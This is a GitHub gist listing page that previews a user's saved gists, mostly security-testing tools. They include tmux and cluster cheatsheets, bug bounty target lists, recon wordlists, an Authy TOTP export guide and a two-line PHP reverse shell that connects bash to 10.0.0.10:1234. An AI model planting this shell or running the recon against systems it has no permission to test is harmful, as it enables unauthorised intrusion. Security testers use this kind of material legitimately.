Skip to content

Instantly share code, notes, and snippets.

View RogueSMG's full-sized avatar

Satyam Gothi RogueSMG

View GitHub Profile
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active November 17, 2024 01:28
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@beekhof
beekhof / pcs-crmsh cheatsheet.md
Last active October 24, 2021 23:17
Transition guide for common crmsh commands

Display the configuration

crmsh # crm configure show
pcs   # pcs cluster cib

Display the current status

crmsh # crm_mon -1
pcs   # pcs status
@rshipp
rshipp / shell.php
Created July 17, 2014 15:06
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
@random-robbie
random-robbie / DutchGov.txt
Last active September 11, 2024 04:28
Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope - taken from - https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid
http://www.rijksoverheid.nl
http://www.rivm.nl
http://coronadashboard.rijksoverheid.nl
http://www.nederlandwereldwijd.nl
http://www.government.nl
http://lci.rivm.nl
http://www.rvo.nl
http://www.defensie.nl
http://www.werkenvoornederland.nl
http://www.rijkswaterstaat.nl
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@jhaddix
jhaddix / content_discovery_all.txt
Created May 26, 2018 11:51
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
@louiszuckerman
louiszuckerman / AuthyToOtherAuthenticator.md
Created August 30, 2018 16:06 — forked from gboudreau/AuthyToOtherAuthenticator.md
Export TOTP tokens from Authy

Generating Authy passwords on other authenticators


There is an increasing count of applications which use Authy for two-factor authentication. However many users who aren't using Authy, have their own authenticator setup up already and do not wish to use two applications for generating passwords.

Since I use 1Password for all of my password storing/generating needs, I was looking for a solution to use Authy passwords on that. I couldn't find any completely working solutions, however I stumbled upon a gist by Brian Hartvigsen. His post had a neat code with it to generate QR codes (beware, through Google) for you to use on your favorite authenticator.

His method is to extract the secret keys using Authy's Google Chrome app via Developer Tools. If this was not possible, I guess people would be reverse engineering the Android app or something like that. But when I tried that code, nothing appeared on the screen. My gues

knmi.nl
rijksoverheid.nl
overheid.nl
duo.nl
politie.nl
koninklijkhuis.nl
defensie.nl
kadaster.nl
werkenbijdefensie.nl
cbs.nl
if [[ "$(dig @1.1.1.1 A,CNAME {test321123,testingforwildcard,plsdontgimmearesult}.$domain +short | wc -l)" -gt "1" ]]; then
echo "[!] Possible wildcard detected."
fi
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active November 17, 2024 16:48
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000